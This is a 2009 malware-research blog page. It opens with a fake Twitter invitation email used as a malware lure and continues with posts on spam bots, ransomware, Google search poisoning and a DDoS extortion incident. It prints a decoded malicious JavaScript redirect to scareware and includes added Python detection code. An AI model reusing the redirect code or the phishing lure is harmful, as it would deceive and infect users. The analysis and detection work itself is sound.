Twitter is a service for friends, family, and co-workers to communicate and stay connected through the exchange of quick, frequent answers to one simple question: What are you doing?

To join or to see who invited you, check the attachment.


Arrow_on_red Watch a video! <>

Please sign in

user name or email address:


Remember me

Forgot password? Click here <> .

Already using Twitter from your phone? Click here. <>



Twitter is the first thing on the web that I've been excited about in ages.

Jason Kottke, Blogger

I really like Twitter.

Jeff Barr,, Senior Manager

Incredibly useful




* 2009 Twitter
* About Us <>
* Contact <>
* Blog <>
* Status <>
* Apps <>
* API <>
* Search <>
* Help <>
* Jobs <>
* Terms <>
* Privacy <>


Delivered-To: {REMOVED}
X-FDA: 62358624678
X-Panda: scanned!
X-Filterd-Recvd-Size: 428259
Received: from ( [])
by (Postfix) with ESMTP
for <{REMOVED}>; Wed, 17 Jun 2009 15:51:05 +0000 (UTC)
Subject: Your friend invited you to twitter!
Date: Wed, 17 Jun 2009 09:49:09 -0600
MIME-Version: 1.0
Content-Type: multipart/mixed;
X-Priority: 3
X-MSMail-Priority: Normal
X-EsetId: 81896726F0AC3330DBCF

Oh and yep, detection for it is rubbish;


I've not looked at this yet as it's only just arrived, but here's the TE report for you (JoeBox couldn't analyze it, and my test machine isn't back up yet - still in pieces);

Monday, 15 June 2009

Pastebin Botnets

I've always been interested in Botnet research, and a piece of code in circulation on forums at the moment seemed interesting enough to write about. The subject is "Pastebin Botnets", but first we'd better talk a little bit about Pastebins...

Pastebins - what are they?

From Wikipedia:

A pastebin, also known as a nopaste, is a web application which allows its users to upload snippets of text, usually samples of source code, for public viewing. It is very popular in IRC channels where pasting large amounts of text is considered bad etiquette. A vast number of pastebins exist on the Internet, suiting a number of different needs and provided features tailored towards the crowd they focus on most.

Pastebins have become very popular in certain hacking communities, where quick and easy sharing of a target's personal information ("Dox") is perfectly at home in the world of pastebins.

Read more

Saturday, 13 June 2009

Spambot Search Tool v0.32

Date: 13-06-2009

+ Added function GetSpammerCount
* Modified index.php so it uses GetSpammerCount to obtain the spammer count from the DB if $bln_SaveToDB is enabled, and counter.txt if it isn't.
* Modified spammer list output when viewing e-mail reports
* Modified IMAP code so e-mails are sorted by date order
* Modified spammer list output and display when viewing text/MySQL records
* Fixed form (index.php) display on Opera

I am working on adding a caching facility, and of course, pagination (for the viewing reports pages). The latter is being a PITA at present (pagination + IMAP seems to = annoyance).

Tuesday, 9 June 2009

In the UK? Own a mobile? You NEED to read this!

Did you know your operator sold your number to marketing firms, who then sold it to this outfit?

Millions opted into UK mobile phone directory

A public mobile phone directory for the UK will launch later this month, loaded with millions of private numbers bought from marketing departments.

From June 18, callers to 118800 will be asked for a first name, a surname and a town*. If a match is found, they will be connected to that person's mobile for £1.

Connectivity, the start-up firm behind the service, says it will never give out numbers or other personal details, and will ask the recipient's permission before connecting the call. It also promises in its FAQ not to sell or pass data to commercial organisations, and to monitor its directory for any suspicious usage patterns.

The firm is coy about how it built its list of "many millions" of mobile numbers. "Our mobile phone directory is made up from various sources," Connectivity wrote.

"Generally it comes from companies who collect mobile telephone numbers from customers in the course of doing business and have been given permission by the customers to share those numbers."


Data watchdog clears mobile phone directory - You agreed for your details to be used like this, right?


There is a freephone number for those that want to opt out apparently, but it takes up to 4 weeks;

0800 138 6263

Yet another SPAM Bot

Today while I was casually going through my sandnet logs, one malware outbound communication suddenly caught my attention. This communication certainly looked like a SPAM template download. Unlike other famous botnets like Cutwail, Rustock, Tofsee, Srizbi, Xarvester, etc, the spam template was in plain text and all the artifacts were clearly visible.

The first question in my mind was to find the name of this SPAM bot. A virustotal report could help, but in this case, it confused me further.

See it for yourself:


My next attempt was to search for some information based on the command and control name ''. But no luck..

I had no choice but to start my investigation from point zero. Here are some of my findings:


I'm not sure.

Infection Vector:

The name of the malware binary file (as it reached me) was e-card.exe. It's not difficult to understand that this might be the outcome of yet another social engineering based mail campaign which lures users into clicking on fake greeting card links.


No real attempt was made by this malware instance to hide itself deeply on the infected system. Upon execution, this malware copies itself under %WINDOWS%/SYSTEM with the name of 'winlogon.exe', and further adds itself under


so that it will start on every system start up.


It's another template based SPAM bot like all the major players. This SPAM template was divided into different logical sections which I'll explain one by one:

Monday, 8 June 2009

FireEye: Ransom - Pay me more - Part II

Ransom - Pay me more - Part II

I recently got an important clue as to how this ransom deal takes place between a victim and these cyber criminals. One reader who became a victim of this ransomware dropped an email to this ransom guy at the address for recovery of his files. This was the response by that guy:

"Transfer into account pay pal 50 dollars here email pay pal"

Interestingly, instead of asking him for the standard $10 ransom (as mentioned in his earlier message) he asked him for $50, typical criminal mentality, isn't it? Unfortunately his greed doesn't end here. This malware instance came bundled in a fake 'SWF video codec' file. Upon execution this setup file installs three different pieces of malware on the victim machine including this ransomware.

1. 5f9927ee59b4881a2ce8634332f63fa8

Trojan Encoder, the one that encrypts the user file and asks for ransom in return.

2. 010d7b79d002d747f420a7880f89ee38

A password stealing Trojan that uploads user personal information on a remote command and control server ( using obfuscated protocol on TCP port 3460.


Read more

Sunday, 7 June 2009

Roguerific! aka: Don't worry Google, we can wait ....

Alas it seems, with all of the publicity and all of the reports that Google have been sent, they've still not been bothered to remove the malicious domains from their Google index, or the malicious blogs on their Blogspot service (and yes, I'm aware Google aren't the only company with these problems, but they're the most popular so at present, are seeing the most abuse).

I've been monitoring the Google results since my last report on the Google poisoning issue, and have been saddened to see not a reduction in the amount of malicious URL's in the index - but an increase.

Almost every single one for this variation (there are of course other variations) I've seen thus far has had identical properties that, for a search engine with a spider as good as Google's, should be easy enough to identify and eradicate;

1. All URL's lead to a page with;

  1. a 2.js file
  2. gibberish in <pre></pre> tags and further such .htm pages linked to each other underneath (all pages linked to, have identical properties)
  3. ALL pages on the domain link to each other, with identical tags (and ONLY link to these pages) and link to the 2.js file
  4. ALL pages have title tags that have the name of the .htm file in them 3 times, for example;

    cadets.htm - cadets (cadets on the waterfront, yesterday tractor cub cadets)
    broderick.htm - broderick (terrace dining room broderick, lillian broderick)
    prototype.htm - prototype (vecto prototype board, what is a prototype lexical relation)
    sli.htm - sli (p5n32 sli installation, bfg 7950 gt sli
    achat.htm - achat (achat immobilier bons en chablais, centrale achat electrom nager)
    etc etc etc ....

    Full results for two of the domains, can be found at;

  5. All links are encased in <tt></tt> tags.

2. All pages are in sub-directories that have gibberish folder names
3. The 2.js file ALWAYS begins with eval(String.fromCharCode(
4. The decoded JS contains;

function f(){

var r=document.referrer,t="",q;

window.location = (""+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");

window.onFocus = f()

Obviously, the URL that window.location takes you to, differs (seems to change every few days to a week or so).

5. The 2.js files are the same size (3K), though different MD5's
6. The resulting URL that window.location takes you to, ALWAYS goes through intermediaries, but invariably leads to a rogue that contains the usual scareware content, which again, should be a piece of cake for Google's spider to identify.

In the case of this is;
  3. (Intermediary)
  6. (PAYLOAD)

    Threat Expert:

7. The folder containing the files almost always has an open index, presumably to improve SEO
8. The parent folder of the folder containing the files, also has an open index, and contains a file called "c", the contents of which, contain the folders name (the one in the Google index), and "200"

With a file called 1t, containing the .htm file names;

A 1r file, containing the file and folder names in the format "folder/file.htm"

And finally, a randomly named PHP file (8.7K), whose content has always been <ok>

On a side note, it appears the rogue domain in this case only allows a max of 2 connections per IP, as subsequent attempts result in its returning a 404 (checking via a proxy confirmed this). It's also worth noting that attempts to grab the executable directly aren't going to work, as the filename is partially static and partially dynamic (Setup-{random}_02004.exe). I've grabbed 4 separate files thus far.
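The traits listed above are mechanical enough to check in a crawler. The following is an added example, not code from the original post: it decodes the eval(String.fromCharCode( wrapper statically, without running any JavaScript, and tests a page against the listed properties. The function names, the sample markup and the stand-in script pointing at example.invalid are assumptions.

```python
import re

# Matches a file that begins with eval(String.fromCharCode(<numbers>)).
CHARCODE_CALL = re.compile(r"\s*eval\(\s*String\.fromCharCode\(([\d\s,]+)\)\s*\)")

def decode_charcode_js(js_text):
    """Decode the wrapper statically (no JS engine, nothing is executed).
    Returns the hidden source, or None if the file does not start with the wrapper."""
    m = CHARCODE_CALL.match(js_text)
    if not m:
        return None
    return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())

def page_traits(filename, html, js_text):
    """Check one crawled page and its 2.js against the traits listed in the post."""
    stem = filename.rsplit(".", 1)[0].lower()
    title = re.search(r"<title>(.*?)</title>", html, re.I | re.S)
    title_text = title.group(1).lower() if title else ""
    links = re.findall(r"<a\s[^>]*href=", html, re.I)
    tt_links = re.findall(r"<tt>\s*<a\s[^>]*href=", html, re.I)
    decoded = decode_charcode_js(js_text) or ""
    return {
        "name_3x_in_title": len(re.findall(r"\b%s\b" % re.escape(stem), title_text)) >= 3,
        "pre_block": bool(re.search(r"<pre>.*?</pre>", html, re.I | re.S)),
        "all_links_in_tt": bool(links) and len(links) == len(tt_links),
        "loads_2js": bool(re.search(r"<script[^>]+src=[\"'][^\"']*2\.js[\"']", html, re.I)),
        "js_charcode_wrapper": bool(decoded),
        "js_referrer_redirect": "document.referrer" in decoded and "window.location" in decoded,
    }

def score(traits):
    """Number of traits matched; a crawler could quarantine pages above a threshold."""
    return sum(traits.values())

# Constructed sample input. The title is one quoted in the post; the markup around it,
# the link targets and the stand-in script are made up for this example.
SAMPLE_HTML = """<html><head>
<title>cadets (cadets on the waterfront, yesterday tractor cub cadets)</title>
<script src="2.js"></script></head><body>
<pre>qwe rty uio asd fgh jkl</pre>
<tt><a href="broderick.htm">broderick</a></tt>
<tt><a href="prototype.htm">prototype</a></tt>
</body></html>"""
STAND_IN = 'var r=document.referrer;window.location="http://example.invalid/?r="+r;'
SAMPLE_JS = "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in STAND_IN) + "))"
BENIGN_HTML = "<html><head><title>Cadets club</title></head><body><a href='a.htm'>a</a></body></html>"

if __name__ == "__main__":
    print(decode_charcode_js(SAMPLE_JS))
    print(page_traits("cadets.htm", SAMPLE_HTML, SAMPLE_JS))
    print(score(page_traits("cadets.htm", BENIGN_HTML, "alert(1);")))
```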

Bloggers bias - prepare for disclosure

I read on Bradley's blog that the FTC are considering changes that will finally force those bloggers giving rave reviews, to disclose the fact they've received a copy of whatever it is, for free - and it's about bloody time too.

I've seen hundreds of blogs just on the subject of antimalware, raving about a product, without disclosing the fact that they're getting paid to promote it, which is even worse.

I'll save my rant though. For details on this, see Bradley's blog;

Tuesday, 2 June 2009

Research: KoobFace -

I was asked by a friend if I could sniff out all of the IP addresses that the domain was redirecting to, and after spending over 30 mins trying to do it manually, decided to ask a few fellow researchers if they were aware of a way of doing it automatically - sadly they weren't.

I decided therefore, to throw something together myself to see if I could get the results I required, and the results were interesting.

I told the program to send 1000 requests to (spaced out of course), and had it list all of the IP's that it redirected to, including of course, the URL's themselves - out of the 1000 requests, there were only 296 unique IP addresses. Something I was not expecting.

The entire list is below for your blacklisting and/or researching pleasure.

And the list of IP's themselves;

I've not yet run the list through hpObserver to get the PTR's for the IP's, but will do that later (absolutely knackered at the moment, and busy processing over 2000 other phishing domains).


hpObserver results (includes PTR) for the IP's;

Monday, 1 June 2009

Browser servers down

Just an FYI folks, both of the Avant Browser servers are currently down, and I can't get hold of Anderson (there's a number for him in China, but costs a bleedin fortune to call over there, so only gonna do that if I absolutely have to).

I've been on the phone to HopOne, who provide the dedicated servers for Avant, and they're going to reboot the main server as it is showing as unreachable, however, they can't do anything about the server, which also houses the sites, without Anderson's approval, so they're going to send him an e-mail with a reboot request.

If I've not heard from Anderson by 21:00 GMT, I'll give him a call.

I'll update this post when I know more.

Affected servers

Affected sites

Apologies for any inconvenience.

/edit 02-06-2009 02:45

I am happy to report, all servers are now back online.

Initial investigations show the downtime was caused by an HTTP flooding attack against the Avant Browser website. Talking to Anderson revealed an attacker from China, incidentally the same country as Anderson, was flooding the server and had contacted Anderson via QQ (apparently the same as WLM) informing him he would not stop the attack until Anderson had paid him the amount asked for. Anderson informed me the attacker only asked for $300, which is the smallest amount I've ever heard of being demanded by an attacker.

At the present time, I don't have very much information on the attacker himself (I'll be getting more within the next day or two). However, analysis did show one thing in common - the user agent for all of the IP's he had attacking the servers, was identical;


Unfortunately for our attacker this made it extremely simple to identify and filter out the flooding, both at the server level, and once we'd given this information to the hosting company, at the hosting co level as well. No doubt this won't stop him for long as the UA is obviously faked anyway, and can quite easily be changed, but we've also taken the step of adding extra security and filtering to the servers themselves, and have blacklisted the IP ranges of those identified.
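The identification step described above can be reproduced from an access log. This is an added example, not the tooling used during the incident: it flags a user agent sent by many IPs that each make many requests and together dominate the traffic. The thresholds, the log lines and the user agent strings are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" format: ip - - [time] "request" status bytes "referer" "user-agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')

FLOOD_UA = "ExampleFloodAgent/1.0 (constructed)"   # placeholder, not the UA from the incident
BROWSER_UAS = [                                     # constructed stand-ins for normal visitors
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11",
    "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1",
]

def ua_profile(lines):
    """Per user agent: total requests and the set of client IPs that sent it."""
    hits = defaultdict(int)
    ips = defaultdict(set)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        ip, ua = m.groups()
        hits[ua] += 1
        ips[ua].add(ip)
    return hits, ips

def flood_agents(lines, min_ips=5, min_per_ip=20, min_share=0.5):
    """User agents shared by many IPs, each sending many requests, that dominate the log."""
    hits, ips = ua_profile(lines)
    total = sum(hits.values())
    flagged = []
    for ua, n in hits.items():
        if (len(ips[ua]) >= min_ips and n / len(ips[ua]) >= min_per_ip
                and n / total >= min_share):
            flagged.append({"ua": ua, "requests": n, "ips": sorted(ips[ua])})
    return flagged

def build_sample_log():
    """Constructed log: 8 flooding clients with one shared UA, plus 20 ordinary visitors."""
    fmt = '%s - - [01/Jun/2009:20:%02d:%02d +0000] "GET / HTTP/1.1" 200 512 "-" "%s"'
    lines = []
    for host in range(1, 9):                # 203.0.113.1-8 (documentation range), 30 hits each
        for i in range(30):
            lines.append(fmt % ("203.0.113.%d" % host, 0, i, FLOOD_UA))
    for host in range(1, 21):               # 198.51.100.1-20, 3 hits each
        ua = BROWSER_UAS[host % len(BROWSER_UAS)]
        for i in range(3):
            lines.append(fmt % ("198.51.100.%d" % host, 5, i, ua))
    return lines

if __name__ == "__main__":
    for hit in flood_agents(build_sample_log()):
        print(hit["ua"], hit["requests"], "requests from", len(hit["ips"]), "IPs")
```

Ordinary browser strings are also shared by many visitors, which is why the check requires a high per-IP request count and traffic share in addition to the shared UA.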

The IP's we identified were;

I'll post more in due course.